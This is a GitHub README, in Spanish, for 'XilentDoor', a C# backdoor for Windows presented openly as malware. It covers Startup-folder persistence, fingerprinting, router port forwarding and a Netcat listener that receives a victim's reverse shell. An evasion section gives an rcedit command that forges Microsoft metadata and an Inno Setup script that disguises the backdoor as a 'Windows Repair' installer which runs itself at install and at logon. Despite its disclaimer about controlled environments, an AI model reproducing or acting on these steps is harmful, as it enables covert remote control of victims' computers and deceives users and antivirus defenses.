Skip to content

R3LI4NT/XilentDoor

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

34 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

XilentDoor

Acerca de XilentDoor

XilentDoor es un backdoor escrito en C# orientado a sistemas Windows. Un backdoor es un tipo de malware diseñado para abrir una puerta trasera permanente en el equipo comprometido, permitiendo al atacante acceder y controlar el sistema de forma sigilosa.

Es parte de la familia XilentLocker, XilentRAT y XilentLogger

Características de XilentDoor 1.0:

  • Persistencia: El Backdoor se auto-copia en la ruta AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup, lo que permite que se ejecute automáticamente cada vez que el sistema se reinicie. 1

  • Fingerprinting: Recopila información básica del sistema donde se ejecuta el backdoor. Esta funcionalidad se suele usar para identificar la máquina víctima o confirmar la infección exitosa antes de enviar datos al atacante. 2

Modo de uso

dotnet build -c Release <- el .exe se guarda en XilentDoor\bin\Release\net6.0\XilentDoor.exe
dotnet run <- Ejecuta el Backdoor

Con el siguiente comando compilan el Backdoor con todas las dependencias, significa que podrán ejecutar el programa en cualquier directorio:

dotnet publish -c Release -r win-x64 --self-contained true /p:PublishSingleFile=true /p:IncludeAllContentForSelfExtract=true
  • (3) En el método Main (archivo Program.cs) modifican la IP y puerto del listener (máquina atacante). 3

Backdoor Remoto

Para infectar remotamente un sistema Windows, es necesario configurar un puerto en modo escucha en el router. Esto se puede lograr accediendo al panel de administración del router, disponible en http://192.168.1.1. En la casilla de LAN Host es la IP local de la máquina atacante (Kali Linux) y el puerto puede ser aleatorio.

1 2

En Program.cs ingresan su IP pública y puerto, y compilan el programa a .EXE.

4

En la máquina atacante (Kali Linux), configure Netcat para escuchar en el puerto previamente seleccionado. Si el usuario ejecuta el programa, se establecerá una conexión y obtendrá acceso a una shell remota.

3

Evasión Tips

En las pruebas realizadas con el backdoor, los antivirus externos no detectan su presencia. Sin embargo, Microsoft Defender SmartScreen actúa como un filtro reputacional, bloqueando ejecutables nuevos, no firmados o con poca distribución.

20240712112504846_EN_1

Para evadir SmartScreen, podemos firmar el ejecutable con un certificado digital (lo ideal es adquirir un certificado de firma de código, Code Signing Certificate) o bien empaquetar el instalador (.EXE/.MSI) y modificar sus metadatos para reducir su detectabilidad.

Primero debemos de modificar los metadatos y para ello podemos usar herramientas como Resource Hacker o Recedit.

rcedit-x64.exe XilentDoor.exe --set-version-string "CompanyName" "Microsoft Corporation" --set-version-string "ProductName" "Windows Tool" --set-version-string "FileDescription" "Windows Repair" --set-file-version "1.3.5.0" --set-product-version "1.2.5.0" --set-icon "icon.ico"
PARÁMETRO DESCRIPCIÓN
CompanyName Nombre de la empresa/organización falsa.
ProductName Nombre del producto.
FileDescription Descripción que aparece en el taskmanager (Administrador de Tareas).
--set-file-version Versión técnica del archivo.
--set-product-version Versión del producto general.
--set-icon Icono visual.
evasion-metada

Luego empaquetaremos el .EXE/.MSI en un installer utilizando herramientas como Inno SetUp o NSIS. En mi caso utilizaré Inno, luego de escribir los metadatos del .EXE debemos de crear un script con el nombre instalador.iss con el siguiente contenido:

[Setup]
AppName=Windows Tool
AppVersion=1.3.5.0
DefaultDirName={localappdata}\WindowsRepair
DisableProgramGroupPage=yes
OutputDir=.
OutputBaseFilename=installer_windows_tool
Compression=lzma
SolidCompression=yes

[Files]
Source: "C:\Users\Usuario\Desktop\MALWARE\Evasion\XilentDoor.exe"; DestDir: "{app}"; Flags: ignoreversion

[Icons]
Name: "{userstartup}\Windows Repair"; Filename: "{app}\XilentDoor.exe"; IconFilename: "{app}\XilentDoor.exe"

[Run]
Filename: "{app}\XilentDoor.exe"; Description: "Ejecutando Windows Repair..."; Flags: nowait postinstall skipifsilent
PARÁMETRO DESCRIPCIÓN
AppName y AppVersion Nombre visible del programa falso.
DefaultDirName Instala en AppData\WindowsAudio (poco sospechoso).
OutputDir El .exe del instalador se guardará en el mismo directorio.
Files Copia XilentDoor.exe a la carpeta destino.
Icons Crea una entrada en Inicio → Ejecutar al iniciar sesión.
Run Ejecuta el backdoor automáticamente tras la instalación.

En el menu de Inno le damos a Build -> Compile.

evasion-installerSetUp

Nos dejará el instalador "legítimo", pero detrás se ejecutará el backdoor y en el Administrador de Tareas aparecerá como una herramienta de reparación de Windows.

evasion-installerSetUp-2

Correo de contacto:

Caution

Cualquier uso indebido de este software será de exclusiva responsabilidad del usuario final, y no del autor. Este proyecto tiene como objetivo inicial demostrar las capacidades de C# como lenguaje para el desarrollo de malware en entornos controlados.

Developer: R3LI4NT

Releases

No releases published

Packages

No packages published

Languages